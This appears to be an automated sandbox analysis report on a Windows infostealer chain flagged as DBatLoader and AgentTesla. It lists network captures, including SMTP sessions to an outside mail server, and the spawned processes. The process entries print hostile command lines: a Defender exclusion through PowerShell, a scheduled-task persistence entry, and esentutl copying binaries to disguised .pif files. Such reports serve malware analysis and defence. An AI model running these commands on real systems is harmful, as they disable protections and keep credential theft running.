                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d
                                                                                                              Data Ascii: nbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57
                                                                                                              Data Ascii: oKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKW


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649712104.26.13.2054433796C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-12 14:55:10 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-12 14:55:10 UTC399INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 12 Nov 2024 14:55:10 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 14
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8e175c8b79822c98-DFW
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1846938&cwnd=238&unsent_bytes=0&cid=8ce15a732e678848&ts=276&x=0"
                                                                                                              2024-11-12 14:55:10 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
                                                                                                              Data Ascii: 173.254.250.68


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.649750104.26.13.2054432968C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-12 14:55:25 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-12 14:55:25 UTC399INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 12 Nov 2024 14:55:25 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 14
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8e175ce8b81647a8-DFW
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2162808&cwnd=251&unsent_bytes=0&cid=00cf1616bd302eeb&ts=602&x=0"
                                                                                                              2024-11-12 14:55:25 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
                                                                                                              Data Ascii: 173.254.250.68


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.649781104.26.13.2054435328C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-12 14:55:33 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-12 14:55:33 UTC399INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 12 Nov 2024 14:55:33 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 14
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8e175d1a9c79e857-DFW
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2159&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1334562&cwnd=243&unsent_bytes=0&cid=df8be34052f87932&ts=359&x=0"
                                                                                                              2024-11-12 14:55:33 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
                                                                                                              Data Ascii: 173.254.250.68


                                                                                                              SMTP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                              Nov 12, 2024 15:55:14.193897009 CET5874971451.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:13 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:55:14.194489002 CET5874971451.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:13 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:55:14.194719076 CET5874971451.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:13 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:55:14.322037935 CET49714587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:55:14.566231012 CET5874971451.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 12, 2024 15:55:14.566481113 CET49714587192.168.2.651.195.88.199STARTTLS
                                                                                                              Nov 12, 2024 15:55:14.810122013 CET5874971451.195.88.199192.168.2.6220 TLS go ahead
                                                                                                              Nov 12, 2024 15:55:20.072123051 CET5874972951.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:19 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:55:20.072320938 CET49729587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:55:20.314228058 CET5874972951.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 12, 2024 15:55:20.314373016 CET49729587192.168.2.651.195.88.199STARTTLS
                                                                                                              Nov 12, 2024 15:55:20.556962013 CET5874972951.195.88.199192.168.2.6220 TLS go ahead
                                                                                                              Nov 12, 2024 15:55:29.291229010 CET5874976451.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:29 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:55:29.291485071 CET49764587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:55:29.530637026 CET5874976451.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 12, 2024 15:55:29.530822039 CET49764587192.168.2.651.195.88.199STARTTLS
                                                                                                              Nov 12, 2024 15:55:29.770565033 CET5874976451.195.88.199192.168.2.6220 TLS go ahead
                                                                                                              Nov 12, 2024 15:55:36.646610022 CET5874979151.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:36 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:55:36.750961065 CET49791587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:55:36.990494013 CET5874979151.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 12, 2024 15:55:36.991472006 CET49791587192.168.2.651.195.88.199STARTTLS
                                                                                                              Nov 12, 2024 15:55:37.238938093 CET5874979151.195.88.199192.168.2.6220 TLS go ahead
                                                                                                              Nov 12, 2024 15:55:41.566704035 CET5874980651.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:41 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:55:41.566915035 CET49806587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:55:41.808840036 CET5874980651.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 12, 2024 15:55:41.812414885 CET49806587192.168.2.651.195.88.199STARTTLS
                                                                                                              Nov 12, 2024 15:55:42.053936958 CET5874980651.195.88.199192.168.2.6220 TLS go ahead
                                                                                                              Nov 12, 2024 15:57:52.116003036 CET5874999851.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:57:51 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:57:52.116137981 CET49998587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:57:52.360385895 CET5874999851.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 12, 2024 15:57:52.360538960 CET49998587192.168.2.651.195.88.199STARTTLS
                                                                                                              Nov 12, 2024 15:57:52.604729891 CET5874999851.195.88.199192.168.2.6220 TLS go ahead
                                                                                                              Nov 12, 2024 15:58:23.840064049 CET5874999951.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:58:23 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:58:23.840249062 CET49999587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:58:24.083244085 CET5874999951.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 12, 2024 15:58:24.083436966 CET49999587192.168.2.651.195.88.199STARTTLS
                                                                                                              Nov 12, 2024 15:58:24.324368954 CET5874999951.195.88.199192.168.2.6220 TLS go ahead
                                                                                                              Nov 12, 2024 15:59:13.484740019 CET5875000151.195.88.199192.168.2.6220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:59:13 +0000
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 12, 2024 15:59:13.484862089 CET50001587192.168.2.651.195.88.199EHLO 835180
                                                                                                              Nov 12, 2024 15:59:14.074748993 CET5875000151.195.88.199192.168.2.6250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-STARTTLS
                                                                                                              250 HELP

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:09:54:59
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\Desktop\x.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\x.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'081'856 bytes
                                                                                                              MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:09:55:04
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:09:55:04
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:09:55:04
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:352'768 bytes
                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:09:55:05
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:352'768 bytes
                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:09:55:05
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:09:55:06
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Imagebase:0x400000
                                                                                                              File size:68'096 bytes
                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:09:55:07
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:250'368 bytes
                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 88%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:09:55:07
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                              Imagebase:0xb00000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 66%, ReversingLabs
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:11
                                                                                                              Start time:09:55:09
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                              Imagebase:0x650000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:12
                                                                                                              Start time:09:55:09
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:09:55:09
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
                                                                                                              Imagebase:0x840000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:14
                                                                                                              Start time:09:55:09
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:15
                                                                                                              Start time:09:55:11
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                              Imagebase:0xb60000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 66%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:16
                                                                                                              Start time:09:55:11
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                              Imagebase:0x6d0000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:17
                                                                                                              Start time:09:55:11
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:18
                                                                                                              Start time:09:55:11
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:19
                                                                                                              Start time:09:55:11
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:timeout 6
                                                                                                              Imagebase:0x1e0000
                                                                                                              File size:25'088 bytes
                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:20
